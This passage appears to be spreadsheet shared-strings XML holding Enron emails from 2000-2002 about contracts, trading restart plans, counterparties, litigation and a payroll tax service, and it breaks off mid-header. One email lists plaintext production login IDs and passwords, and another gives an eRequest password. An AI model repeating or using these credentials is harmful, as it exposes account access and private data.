  <si>
    <t>Fri, 8 Sep 2000 10:58:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Papers</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 09/08/2000 _x000D_
06:04 PM ---------------------------_x000D_
_x000D_
_x000D_
Vince J Kaminski_x000D_
09/01/2000 04:37 PM_x000D_
To: vkaminski@aol.com_x000D_
cc:  _x000D_
Subject: Papers_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 24 Jan 2001 14:19:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jeffery.fawcett@enron.com', 'kevin.hyatt@enron.com', 'tk.lohman@enron.com', 'michelle.lokay@enron.com'})</t>
  </si>
  <si>
    <t>Expansion</t>
  </si>
  <si>
    <t xml:space="preserve">Attached please find the TW Expansion Open Season Results and the Expansion Offering Package.  As we agreed yesterday, we will begin talking with Tier 1 shippers today.  Please note that a followup meeting has been scheduled for 1:30 - 2:30 Wed. 2/7 to continue discussions.  Good Luck!_x000D_
_x000D_
_x000D_
  </t>
  </si>
  <si>
    <t>Thu, 26 Apr 2001 07:20:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>592748</t>
  </si>
  <si>
    <t>Hello, I received a phone call from Ron at Harbor Cogeneration.  He does not _x000D_
think deal # 592748 flows on Sunday._x000D_
_x000D_
Let me know what you find out._x000D_
_x000D_
Thanks!_x000D_
Melissa</t>
  </si>
  <si>
    <t>Fri, 1 Jun 2001 08:53:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'john.fowler@sun.com'})</t>
  </si>
  <si>
    <t>RE: NDA - Sun Microsystems, Inc.</t>
  </si>
  <si>
    <t xml:space="preserve">Attached please find a draft non-disclosure agreement related to Enron Net _x000D_
Works' and Sun's exchange of information in connection with a possible _x000D_
transaction regarding EnronOnline.  Please feel free to contact me with any _x000D_
comments or questions you may have regading the attached._x000D_
_x000D_
_x000D_
_x000D_
Travis McCullough_x000D_
Enron North America Corp._x000D_
1400 Smith Street EB 3882A_x000D_
Houston Texas 77002_x000D_
Phone:  (713) 853-1575_x000D_
Fax: (713) 646-3393/3490      _x000D_
_x000D_
_x000D_
_x000D_
	"John F. Fowler" &lt;John.Fowler@sun.com&gt;_x000D_
	05/31/2001 05:20 PM_x000D_
	Please respond to "John F. Fowler"_x000D_
		 _x000D_
		 To: Tana.Jones@enron.com, john.fowler@sun.com, Rex.Shelby@enron.com_x000D_
		 cc: Mark.S.Palmer@enron.com, Mark.Greenberg@enron.com, _x000D_
Travis.McCullough@enron.com_x000D_
		 Subject: RE: NDA - Sun Microsystems, Inc._x000D_
_x000D_
_x000D_
Rex, I don't find any mail from Tana Jones.  Please resend, and_x000D_
also include the names of counsel on Sun's side that you worked with_x000D_
to do this._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 19 Apr 2000 03:19:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'thomas.reichelderfer@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'mark.palmer@enron.com', 'mark.koenig@enron.com'})</t>
  </si>
  <si>
    <t>Re: follow up to yesterday's meeting</t>
  </si>
  <si>
    <t xml:space="preserve">Gentlemen:_x000D_
_x000D_
Per Rick, please review  and approve the list of states that Kathleen _x000D_
Magruder (on behalf of ResCo) and Government Affairs intend to visit as part _x000D_
of the ResCo announcement.  The list appears on page 2 of the meeting notes _x000D_
attached below.  Due to the shortness of time, we would like to begin _x000D_
scheduling these meetings as soon as possible so your quick response would be _x000D_
greatly appreciated.  Thanks._x000D_
_x000D_
_x000D_
TSR_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Thomas S Reichelderfer/DUB/EES on _x000D_
04/19/2000 08:59 AM ---------------------------_x000D_
_x000D_
Richard Shapiro_x000D_
04/16/2000 07:16 AM_x000D_
_x000D_
_x000D_
To: Sue Nord/HOU/EES@EES, Steve Montovano/DUB/EES@EES, Kathleen E _x000D_
Magruder/HOU/EES@EES, Steven J Kean/HOU/EES@EES, Jeff Dasovich/SFO/EES@EES, _x000D_
Susan T Covino/HOU/EES@EES, Thomas S Reichelderfer/DUB/EES@EES_x000D_
cc:  _x000D_
Subject: Re: follow up to yesterday's meeting_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Richard Shapiro/HOU/EES on 04/16/2000 _x000D_
07:16 AM ---------------------------_x000D_
_x000D_
Richard Shapiro_x000D_
04/16/2000 07:14 AM_x000D_
_x000D_
_x000D_
To: Kathleen E Magruder/HOU/EES@EES_x000D_
cc:  _x000D_
Subject: Re: follow up to yesterday's meeting_x000D_
_x000D_
Can we discuss No later than Wednesday?( not sure our presence helps or hurts _x000D_
more )-- Also. any early visits would have to be cleared by Koenig and _x000D_
Palmer. _x000D_
---------------------- Forwarded by Richard Shapiro/HOU/EES on 04/16/2000 _x000D_
07:12 AM ---------------------------_x000D_
_x000D_
_x000D_
Janine Migden_x000D_
04/13/2000 08:22 PM_x000D_
To: Kathleen E Magruder/HOU/EES@EES_x000D_
cc: Sue Nord/HOU/EES@EES, Steve Montovano/DUB/EES@EES, Jeff _x000D_
Dasovich/SFO/EES@EES, Susan T Covino/HOU/EES@EES, Thomas S _x000D_
Reichelderfer/DUB/EES@EES, Richard Shapiro/HOU/EES@EES _x000D_
Subject: Re: follow up to yesterday's meeting  _x000D_
_x000D_
Kathleen, Sorry I missed the Houston meeting.  What will be the purpose of _x000D_
the Ohio trip and who who will you be planning on seeing?  Let me know so _x000D_
that I can have folks there with you.  Thanks._x000D_
_x000D_
_x000D_
_x000D_
Kathleen E Magruder_x000D_
04/13/2000 03:58 PM_x000D_
To: Sue Nord/HOU/EES@EES, Steve Montovano/DUB/EES@EES, Jeff _x000D_
Dasovich/SFO/EES@EES, Susan T Covino/HOU/EES@EES, Thomas S _x000D_
Reichelderfer/DUB/EES@EES, Janine Migden/DUB/EES@EES_x000D_
cc: Richard Shapiro/HOU/EES@EES _x000D_
Subject: follow up to yesterday's meeting_x000D_
_x000D_
a few more things have firmed up since yesterday:_x000D_
1) Gene Lockhart was adamant at staff meeting today that the S-1 will be _x000D_
filed May 15.  There will be no slippage.  Consequently, the timetable we _x000D_
discussed will hold.  Also seems that Lay and Skilling both want Enron to be _x000D_
featured in the rollout presentation._x000D_
2) Lockhart wants testimonials from people in TX, PA, and a state of my _x000D_
choosing.  I choose CA and Jesse Knight.  After conferring with Steve _x000D_
Montovano, we've agreed it should be Chick Tulli.  I am going tomorrow to _x000D_
Dallas to solicit Steve Wolens, the TX House bill sponsor who chastised me so _x000D_
roundly for Enron's "pullout" from CA.  I also hope to get a meeting with Pat _x000D_
Wood (TX PUC chair) next Monday._x000D_
3) I plan to make visits to TX, CA, PA, NJ, NY, OH, and CT before the May 1 _x000D_
rollout.  Ideally, I will have Enron people with me._x000D_
4) Mark Manly feels strongly, as do I, that Susan and Thom should be at these _x000D_
meetings._x000D_
_x000D_
Hope to see you next week._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 25 Apr 2001 07:19:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jeff.dasovich@enron.com', 'rosalee.fleming@enron.com'})</t>
  </si>
  <si>
    <t>Ken Lay Meetings in CA</t>
  </si>
  <si>
    <t>Since Steve Kean is planning to accompany Ken on his meetings next week in _x000D_
CA, please be sure to cc Maureen McVicker on all meetings that are scheduled _x000D_
so she can manage Steve's calendar. _x000D_
_x000D_
Thanks.</t>
  </si>
  <si>
    <t>Sun, 30 Dec 2001 08:10:07 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: Re-start/Integration Planning</t>
  </si>
  <si>
    <t xml:space="preserve">Louise- Any notion of amount of risk bidders are comfy with, both credit and market? I doubt anything specific has been discussed but have any ranges been thrown out. Hope all is well. Happy New Year. Rick_x000D_
_x000D_
-----Original Message----- _x000D_
From: Kitchen, Louise _x000D_
Sent: Fri 12/28/2001 1:23 PM _x000D_
To: Rub, Jenny; Webb, Jay; Oxley, David; Myers, Thomas; Colwell, Wes; Hodges, Georgeanne; Taylor, Mark E (Legal); Brackett, Debbie R.; Buy, Rick; Port, David; Beck, Sally; Reeves, Leslie; Hall, Bob M _x000D_
Cc: Lavorato, John _x000D_
Subject: FW: Re-start/Integration Planning_x000D_
_x000D_
_x000D_
_x000D_
Although yesterday's meeting was excellent, we do need to get a lot more detailed on the Re-start plans.  I would like everyone to have completed their re-start plans by the end of next week for mid/back office.  I realize you have all done a tremendous amount of work so far and this is what we really need to get in documentation form particularly as we may have a partner/buyer who we have not had as many detailed meetings with._x000D_
_x000D_
As you can see from the email below we are asking the commercial groups to do the same thing. _x000D_
_x000D_
Let me know if there are any issues - we are planning for a Jan 20 restart. _x000D_
_x000D_
Thanks _x000D_
_x000D_
Louise _x000D_
_x000D_
 -----Original Message----- _x000D_
From:   Kitchen, Louise  _x000D_
Sent:   Thursday, December 27, 2001 4:58 PM _x000D_
To:     Belden, Tim; Calger, Christopher F.; Presto, Kevin M.; Duran, W. David; Robinson, Mitch; Forster, David; Curry, Mike; Arnold, John; Shively, Hunter S.; Milnthorp, Rob; Zufferli, John; Luce, Laura; Vickers, Frank; Neal, Scott; Lagrasta, Fred; Aucoin, Berney C. ; Steffes, James D.; Roberts, Mike A.; Grigsby, Mike; Tycholiz, Barry; Allen, Phillip K.; Redmond, Brian; Martin, Thomas A._x000D_
_x000D_
Cc:     Lavorato, John _x000D_
Subject:        Re-start/Integration Planning _x000D_
_x000D_
We have for the last couple of weeks started to compile the Re-start/Integration Plans for Netco.  So far, we have primarily focussed on the mid/back plans where the technology requirements have been the driving factors.  Several plans are  in progress:-_x000D_
_x000D_
+       Infrastructure          Jenny Rub _x000D_
+       Development             Jay Webb _x000D_
+       EnronOnline             Webb / Forster _x000D_
+       HR                      David Oxley _x000D_
+       Cash Management Tom Myers _x000D_
+       Credit                  Debbie Brackett _x000D_
_x000D_
The rest will be completed shortly. _x000D_
_x000D_
We now need to focus on the commercial plans which have a slightly different focus. John and I would like to receive the plans "Re-start/Integration"  plans by January 7th, 2002 in order to go through them individually with each of you or in groups.  The focus should be to ensure that we have as much of the business up and running in the shortest time possible.  I have a suggested outline which you do not have to use but I thought it might help.  Please decide within yourselves the areas you will cover together or individually._x000D_
_x000D_
Customer Side   _x000D_
+       Customers               Phase  1 - First Week (eg top 10) _x000D_
                                Phase  2 - First Month (eg top 50) _x000D_
                                Phase  3 - First Quarter (eg top 100) _x000D_
+       Action Plan             Phase  1 Customers _x000D_
                                Phase  2 Customers _x000D_
                                Phase  3 Customers _x000D_
+       Contracts by customers (pre-prepared with credit terms etc) _x000D_
+       Customer visit schedule _x000D_
_x000D_
Product Side _x000D_
+       List of Products        Phase 1 - First Week _x000D_
                                Phase 2 - First Month _x000D_
                                Phase 3 - First Quarter _x000D_
_x000D_
Target Number of Transactions _x000D_
+       Phase 1 _x000D_
+       Phase 2 _x000D_
+       Phase 3 _x000D_
_x000D_
IT transfer _x000D_
_x000D_
Louise </t>
  </si>
  <si>
    <t>Thu, 31 Jan 2002 14:33:33 -0800 (PST)</t>
  </si>
  <si>
    <t>FW:  TOP TEN counterparties (for ENA) - Non-Terminated,_x000D_
 in-the-money positions (based upon FMTM information as of 11/30/01)</t>
  </si>
  <si>
    <t>_x000D_
Melissa, _x000D_
_x000D_
Set forth below is the list we discussed.  First determine if there is a physical power relationship with each counterparty listed.  If so, please furnish confirms or a listing that evidence the following requests:_x000D_
_x000D_
	1.	Live Deals as of November 30, 2001_x000D_
	2.	Expired Deals since November 30, 2001_x000D_
	3.	New Deals since November 30, 2001_x000D_
_x000D_
This request must be handled on an expedited, ASAP basis.  _x000D_
_x000D_
Many thanks,_x000D_
_x000D_
Susan S. Bailey_x000D_
Enron North America Corp._x000D_
1400 Smith Street, Suite 3803A_x000D_
Houston, Texas 77002_x000D_
Phone: (713) 853-4737_x000D_
Fax: (713) 646-3490_x000D_
Email: Susan.Bailey@enron.com_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Shackleton, Sara  _x000D_
Sent:	Thursday, January 31, 2002 4:17 PM_x000D_
To:	Tweed, Sheila_x000D_
Cc:	Bailey, Susan; Boyd, Samantha; Panus, Stephanie; Sevitz, Robert; Moran, Tom_x000D_
Subject:	RE:  TOP TEN counterparties (for ENA) - Non-Terminated, in-the-money positions (based upon FMTM information as of 11/30/01)_x000D_
_x000D_
(1)	TXU Energy Trading Company	_x000D_
_x000D_
[(2)	BP Capital Energy Fund LP - may be subject to mutual termination]_x000D_
_x000D_
(2)	Noble Gas Marketing Inc._x000D_
_x000D_
(3)	Puget Sound Energy, Inc._x000D_
_x000D_
(4)	Virginia Power Energy Marketing, Inc._x000D_
_x000D_
[(5)	T. Boone Pickens - may be subject to mutual termination] _x000D_
_x000D_
(5)	Neumin Production Co._x000D_
_x000D_
[(6)	Sodra Skogsagarna Ek For - probably an ECTRIC counterparty]_x000D_
_x000D_
(6)	Texaco Natural Gas Inc.  (may be booked incorrectly for Texaco, Inc. financial trades)_x000D_
_x000D_
(7)	ACE Capital Re Overseas Ltd._x000D_
_x000D_
(8)	Nevada Power Company_x000D_
_x000D_
(9)	Prior Energy Corporation_x000D_
_x000D_
(10)	Select Energy, Inc.	_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Tweed, Sheila  _x000D_
Sent:	Thursday, January 31, 2002 3:10 PM_x000D_
To:	Shackleton, Sara_x000D_
Subject:	_x000D_
_x000D_
Please send me the names of the 10 counterparties that we are evaluating.  Thanks!</t>
  </si>
  <si>
    <t>Wed, 31 Jan 2001 02:44:00 -0800 (PST)</t>
  </si>
  <si>
    <t>---------------------- Forwarded by Judy Townsend/HOU/ECT on 01/31/2001 10:=_x000D_
35=20_x000D_
AM ---------------------------_x000D_
  =20_x000D_
=09Enron North America Corp._x000D_
=09_x000D_
=09From:  Corporate Payroll @ ENRON                           01/29/2001 10=_x000D_
:45 PM_x000D_
=09_x000D_
_x000D_
Sent by: Enron Announcements@ENRON_x000D_
To: All Eligible Enron Employees United States_x000D_
cc: =20_x000D_
Subject: New Employee Service =01) Turbo Tax_x000D_
_x000D_
As tax season rapidly approaches, we are pleased to announce a new W-2=20_x000D_
employee service.  If you plan to file your personal income taxes through=_x000D_
=20_x000D_
TurboTax 2000 (Intuit's personal tax filing software) you will be able to=_x000D_
=20_x000D_
automatically download your W-2 information into the appropriate TurboTax=_x000D_
=20_x000D_
forms directly over the Internet for free. =20_x000D_
_x000D_
Enron has chosen to provide this service to help speed the processing time=_x000D_
=20_x000D_
and accuracy of your return while supporting paperless processing._x000D_
_x000D_
More information regarding this service is listed below or visit=20_x000D_
www.probusinesstaxes.com to find out more about the TurboTax software and=_x000D_
=20_x000D_
Web-based filing service._x000D_
_x000D_
_x000D_
Employee Fact Sheet: ProBusiness/Intuit W-2 service_x000D_
_x000D_
_x000D_
_x000D_
Q.  What is the Automated Tax Return (ATR) service?_x000D_
A. Intuit Inc., makers of the popular Quicken TurboTax tax preparation and=_x000D_
=20_x000D_
filing software, have launched a new Automated Tax Return (ATR) service to=_x000D_
=20_x000D_
simplify tax preparation for TurboTax users. ATR allows users of TurboTax t=_x000D_
ax=20_x000D_
preparation and filing software to import tax information from multiple=20_x000D_
sources such as employers, brokerage houses, and mutual fund companies=20_x000D_
directly into the correct TurboTax forms over the Internet.  Since our=20_x000D_
payroll tax provider, ProBusiness, has partnered with Intuit to provide thi=_x000D_
s=20_x000D_
service, you will be able to electronically download your individual W-2 da=_x000D_
ta=20_x000D_
from ProBusiness directly into TurboTax through the Internet for free. Also=_x000D_
,=20_x000D_
as part of this program, you can receive a  5% discount on all TurboTax and=_x000D_
=20_x000D_
Quicken products including shipping and handling (go to=20_x000D_
www.probusinesstaxes.com for more information)._x000D_
_x000D_
Q. So how does it work?_x000D_
A. Embedded in each version of TurboTax 2000 (both the software and web=20_x000D_
application) is a series of screens that will ask whether your employer=20_x000D_
allows you to automatically download your data into TurboTax.  To use the=_x000D_
=20_x000D_
free service, simply answer "yes" then select our payroll tax provider,=20_x000D_
ProBusiness, from a drop-down list of providers which includes ProBusiness,=_x000D_
=20_x000D_
PeopleSoft, Ceridian, and seemyw2.com.  Validate your request by entering=_x000D_
=20_x000D_
your social security number and W-2 box one data and your W-2 data will=20_x000D_
automatically transfer via the Internet into the appropriate locations in t=_x000D_
he=20_x000D_
TurboTax form._x000D_
_x000D_
Q. Is this a secure transaction?_x000D_
A.  Intuit=01,s TurboTax ATR service combines Open Financial Exchange (OFX)=_x000D_
, the=20_x000D_
standard technology used in e-finance, with 128-bit military-grade encrypti=_x000D_
on=20_x000D_
to create an advanced security protocol that ensures the highest level of=_x000D_
=20_x000D_
security and confidentiality when obtaining financial data to populate your=_x000D_
=20_x000D_
TurboTax form over the Internet._x000D_
_x000D_
Q. How do I participate in this program?=20_x000D_
A.  Only employees using Intuit=01,s TurboTax 2000 tax preparation and fili=_x000D_
ng=20_x000D_
software can take advantage of this Web-based ATR service.  TurboTax softwa=_x000D_
re=20_x000D_
and the ATR Web-based filing service can be accessed at=20_x000D_
www.probusinesstaxes.com._x000D_
_x000D_
Q. What if I already own TurboTax 2000=01(does this still work?_x000D_
A. Yes, all copies of TurboTax 2000 contain the Automated Tax Return servic=_x000D_
e=20_x000D_
option._x000D_
_x000D_
Q. Overall what are the Benefits to me?_x000D_
A.  Using the ATR service provided by Intuit and ProBusiness, you can:_x000D_
? Increase your probability of accurate filing._x000D_
? Eliminate the need to manually enter your W-2 information and other=20_x000D_
financial data._x000D_
? Increase the overall speed of tax filing.</t>
  </si>
  <si>
    <t>Thu, 24 Aug 2000 08:25:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: trading agreement</t>
  </si>
  <si>
    <t>Mark:_x000D_
_x000D_
What is our policy about giving on arbitration.  This is a federal entity _x000D_
that has said they cannot agree to arbitration.  They have agreed to the _x000D_
language set forth in the document attached below._x000D_
_x000D_
Please advise._x000D_
_x000D_
Leslie_x000D_
----- Forwarded by Leslie Hansen/HOU/ECT on 08/24/2000 02:59 PM -----_x000D_
_x000D_
	"Kathleen (Kass) Portra" &lt;Portra@wapa.gov&gt;_x000D_
	08/24/2000 03:01 PM_x000D_
		 _x000D_
		 To: &lt;Leslie.Hansen@enron.com&gt;_x000D_
		 cc: _x000D_
		 Subject: Re: trading agreement_x000D_
_x000D_
_x000D_
Leslie_x000D_
I know this will cause delays, but this agency does not have authority to _x000D_
enter into binding arbitration.  Apparently some agencies do have that _x000D_
authority.  I have attached 2 files.  One is with the changes highlighted and _x000D_
the other is a clean copy of what we would be willing to sign.  Please let me _x000D_
know what sort of timeframe I can expect on a response to this proposal._x000D_
_x000D_
Thanks - Kass Portra_x000D_
_x000D_
 - Western Area Power Admin ETAkp.doc_x000D_
 - Western Area Power Admin ETArjk.doc</t>
  </si>
  <si>
    <t>Mon, 3 Sep 2001 11:34:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Original Dates</t>
  </si>
  <si>
    <t xml:space="preserve">fyi_x000D_
---------------------- Forwarded by Rich Jolly/ET&amp;S/Enron on 09/03/2001 06:34 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
"Leon O'Bryan" &lt;OBryan_Leon_L@solarturbines.com&gt; on 08/31/2001 03:02:18 PM_x000D_
To: &lt;ruth.jensen@enron.com&gt;_x000D_
cc: &lt;Rich.Jolly@enron.com&gt; _x000D_
_x000D_
Subject: Original Dates_x000D_
_x000D_
_x000D_
Ruth,_x000D_
_x000D_
The  following information is provided per your request,_x000D_
_x000D_
I have also faxed you the Solar data sheets "sorted by original engine serial _x000D_
number"._x000D_
_x000D_
Engine serial #        original manufactured date_x000D_
_x000D_
--30647-------------------------------10/10/75_x000D_
_x000D_
--21168--------------------------------06/22/71_x000D_
_x000D_
--20200--------------------------------08/31/66_x000D_
_x000D_
--0457S21----------------------------03/24/81_x000D_
_x000D_
--4223C41----------------------------01/19/89_x000D_
_x000D_
_x000D_
If you have any questions or if I can be of further service please do not _x000D_
hesitate to give me a call._x000D_
_x000D_
Leon O'Bryan_x000D_
(801) 352-5100_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 7 Jun 2001 04:27:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mkass@pillsburywinthrop.com'})</t>
  </si>
  <si>
    <t>frozenset({'dynegy-peoplevdynegy@pillsburylaw.com'})</t>
  </si>
  <si>
    <t>Transcribed Message from ISO Counsel re: Document Production</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;&lt;10515337_1.DOC&gt;&gt;_x000D_
Colleagues:_x000D_
_x000D_
Attached hereto is Norma Formanek's transcribed voicemail message confirming_x000D_
that ISO will not produce documents to plaintiffs until after a protective_x000D_
order has been entered in whichever court this case winds up.  As discussed,_x000D_
I propose to send the following confirming letter:_x000D_
_x000D_
"Thank you for your voicemail confirming that ISO is continuing to abide by_x000D_
our agreement that there will be no production of documents to plaintiffs'_x000D_
counsel until after plaintiffs' remand motion has been heard and we know_x000D_
which court will be entering the protective order that will preserve the_x000D_
confidentiality of documents that are produced.  Defense counsel are_x000D_
reviewing the proposed protective order and will provide comments in the_x000D_
near future."_x000D_
_x000D_
Please let me know if you have any suggestions or changes._x000D_
_x000D_
Thanks._x000D_
_x000D_
Michael J. Kass_x000D_
Pillsbury Winthrop LLP_x000D_
50 Fremont Street, Room 1452_x000D_
San Francisco, CA  94105_x000D_
TEL:  (415) 983-1462_x000D_
FAX:  (415) 983-1200_x000D_
email:  mkass@pillsburywinthrop.com_x000D_
_x000D_
_x000D_
 - 10515337_1.DOC</t>
  </si>
  <si>
    <t>Wed, 6 Feb 2002 14:04:29 -0800 (PST)</t>
  </si>
  <si>
    <t>Access to UBSWenergy Production Environment</t>
  </si>
  <si>
    <t>IMPORTANT- THE IDS BELOW WILL BE YOUR PERMANENT ACCESS TO PRODUCTION_x000D_
_x000D_
Your PRODUCTION User ID and Password has been set up on UBSWenergy.  Please follow the steps below to access the new environment:_x000D_
_x000D_
From Internet Explorer connect to the UBSWenergy Production Cluster through the following link:_x000D_
http://remoteservices.netco.enron.com/ica/ubswenergy.ica  (use your UBSWenergy/Enron NT Log In &amp; Password)_x000D_
_x000D_
From the second Start menu,  select appropriate application:_x000D_
_x000D_
STACK MANAGER_x000D_
User ID: JZUFFER_x000D_
Password: q#9M#npX	(Please Change)_x000D_
_x000D_
Below is a special internal use only link for the simulation purposes only to get to the trading area of the website._x000D_
DO NOT PROVIDE THIS LINK TO ANYONE NOT PART OF THE SIMULATION. _x000D_
(customers should be directed to go to the direct link www.ubsenergy.com)._x000D_
_x000D_
http://www.ubswenergy.com/site_index.html  (FOR SIMULATION ONLY)_x000D_
_x000D_
WEBSITE - Book (ALBERTA LONG TERM POWER)_x000D_
User ID: MUS93962_x000D_
Password: WELCOME!_x000D_
_x000D_
WEBSITE - Book (ALBERTA ORIGINATION)_x000D_
User ID: MUS93124_x000D_
Password: WELCOME!_x000D_
_x000D_
WEBSITE - Book (ALBERTA TRANSFER BOOK)_x000D_
User ID: MUS52346_x000D_
Password: WELCOME!_x000D_
_x000D_
PLEASE DO NOT TRANSACT BEFORE SIMULATION TOMORROW!_x000D_
_x000D_
Should you have any questions or issues, please contact me at x33465 or the Call Center at 713-584-4444_x000D_
_x000D_
_x000D_
Thank you,_x000D_
_x000D_
Stephanie Sever_x000D_
713-853-3465</t>
  </si>
  <si>
    <t>Tue, 10 Oct 2000 08:12:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'erequest@enron.com'})</t>
  </si>
  <si>
    <t>eRequest Password</t>
  </si>
  <si>
    <t>Your eRequest's password is 4311_x000D_
To use this password, go to the eRequest website and click on non-Corp logon._x000D_
Put in your email address and the password above and click Log In, and you _x000D_
will log into eRequest.</t>
  </si>
  <si>
    <t>Mon, 29 Oct 2001 13:55:16 -0800 (PST)</t>
  </si>
  <si>
    <t>Good Afternoon,_x000D_
_x000D_
_x000D_
Any GCP Adjustments will be highlighted in blue.  Please fee free to give me a call, if you have any questions._x000D_
_x000D_
_x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
Amber N Ebow x5-8331_x000D_
Global Counterparty_Enron Net Works_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Lebrocq, Wendi  _x000D_
Sent:	Monday, October 29, 2001 9:55 AM_x000D_
To:	Bradford, William S.; Lees, Lisa; Fayett, Juana; Le, Trang; Maley, Paul; O'day, Karen; Rohauer, Tanya; Lombardi, Kelly; Lindsay, Brian; EOL Call Center; Hare, Bill D.; Heffernan, Amy; Lafuze, Molly; Clark, Danny; Panus, Stephanie; Mandola, Teresa; Ebow, Amber; Coleman, Tandra; Campbell, Lesli; Lebrocq, Wendi; Taylor, Mark E (Legal); Lauer, Kara; Banner, Kimberly; Mcquade, Jennifer; George, Fraisy; Guillory, Michael; Rajaram, Aparna; Monterrey, Maribel; Lebeau, Maria; Escamilla, Albert; Lebrocq, Wendi; Global Emerging Businesses; Lambert, Karen; Jones, Tana; Schott, Samuel; Brackett, Debbie R.; Clark, Cynthia; Enron Europe Global CounterParty,; Sever, Stephanie; Moran, Tom; Clark, Claudia; Curry, Ken_x000D_
Subject:	EOL and Clickpaper Approvals for 10-26-01_x000D_
_x000D_
_x000D_
Please see attached._x000D_
_x000D_
_x000D_
 &lt;&lt; File: EOL 10-26-01.xls &gt;&gt; _x000D_
Regards,_x000D_
_x000D_
Wendi Lebrocq_x000D_
3-3835</t>
  </si>
  <si>
    <t>Wed, 27 Dec 2000 06:19:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'sarah.novosel@enron.com', 'alan.comnes@enron.com', 'tom.briggs@enron.com', 'mpalmer@enron.com', 'mary.hain@enron.com', 'david.parquet@enron.com', 'linda.robertson@enron.com', 'jeff.dasovich@enron.com', 'james.steffes@enron.com', 'mona.petrochko@enron.com', 'tim.belden@enron.com', 'sandra.mccubbin@enron.com', 'cynthia.sandherr@enron.com', 'karen.denne@enron.com', 'christopher.calger@enron.com', 'richard.shapiro@enron.com', 'joe.hartsoe@enron.com', 'susan.j.mara@enron.com', 'donna.fulton@enron.com', 'steven.kean@enron.com'})</t>
  </si>
  <si>
    <t>SoCalEd Petition for a Writ of Mandamus</t>
  </si>
  <si>
    <t xml:space="preserve">On December 26, SoCalEd filed a Petition for a Writ of Mandamus against FERC _x000D_
regarding FERC's December 15 order, asking the Court of Appeals for the D.C. _x000D_
Circuit to direct FERC to establish and order "just and reasonable cost-based _x000D_
rates" for sales in the California ISO and PX markets.  SoCal requests that _x000D_
the Court act by January 5._x000D_
_x000D_
SoCal argues that its lenders have said that unless FERC acts immediately to _x000D_
"restore creditor confidence" in SoCal's ability to repay its loans, that _x000D_
SoCal will not be able to access additional funding, so that by mid-January _x000D_
SoCal will be unable to buy electricity, resulting in rolling blackouts to _x000D_
its customers._x000D_
_x000D_
Please let me know if you have any questions or would like a faxed copy of _x000D_
the petition._x000D_
_x000D_
Sarah_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 2 Jan 2001 03:45:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'janie.aguayo@enron.com', 'brad.schneider@enron.com', 'brent.hendry@enron.com', 'william.bradford@enron.com', 'tanya.rohauer@enron.com', 'susan.bailey@enron.com', 'gordon.heaney@enron.com', 'wendi.lebrocq@enron.com', 'scott.tackett@enron.com', 'brant.reves@enron.com', 'jason.williams@enron.com', 'laurel.adams@enron.com', 'david.dupre@enron.com', 'andrea.guillen@enron.com', 'larry.hunter@enron.com', 'stephanie.panus@enron.com', 'mark.taylor@enron.com', 'celeste.cisneros@enron.com', 'sara.shackleton@enron.com', 'diane.anderson@enron.com', 'lesli.campbell@enron.com', 'john.suttle@enron.com', 'debbie.brackett@enron.com', 'tiffany.williams@enron.com', 'veronica.espinoza@enron.com', 'tana.jones@enron.com', 'tracy.ngo@enron.com', 'carol.clair@enron.com', 'paul.radous@enron.com', 'robert.bruce@enron.com', 'derek.bailey@enron.com', 'samantha.boyd@enron.com', 'mary.cook@enron.com', 'kevin.meredith@enron.com', 'bob.bowen@enron.com'})</t>
  </si>
  <si>
    <t>Entrada Energy Ventures, L.C.C.</t>
  </si>
  <si>
    <t xml:space="preserve">We have received an executed financial Master Agreement:_x000D_
_x000D_
Type of Contract:  ISDA Master Agreement (Multicurrency-Cross Border)_x000D_
_x000D_
Effective Date:   August 21, 2000_x000D_
_x000D_
Enron Entity:   Enron North America Corp._x000D_
_x000D_
Counterparty:   Entrada Energy Ventures, L.L.C._x000D_
_x000D_
Transactions Covered:  Approved for all products with the exception of: _x000D_
Foreign Exchange_x000D_
          _x000D_
Confirming Entity:  Enron North America Corp._x000D_
_x000D_
Choice of Law:  TEXAS_x000D_
_x000D_
_x000D_
Special Note:  ENA owns 50 % of the voting outstanding equity of Entrada _x000D_
Ventures, L.L.C._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 6 Mar 2001 03:25:00 -0800 (PST)</t>
  </si>
  <si>
    <t>EOL approvals, 03-05-01</t>
  </si>
  <si>
    <t xml:space="preserve">Ditto Credit. _x000D_
_x000D_
Thanks, _x000D_
_x000D_
Shari_x000D_
----- Forwarded by Shari Stack/HOU/ECT on 03/06/2001 11:22 AM -----_x000D_
_x000D_
	Tana Jones_x000D_
	03/06/2001 09:09 AM_x000D_
		 _x000D_
		 To: Alan Aronowitz/HOU/ECT@ECT, Jeffrey T Hodge/HOU/ECT@ECT, Shari _x000D_
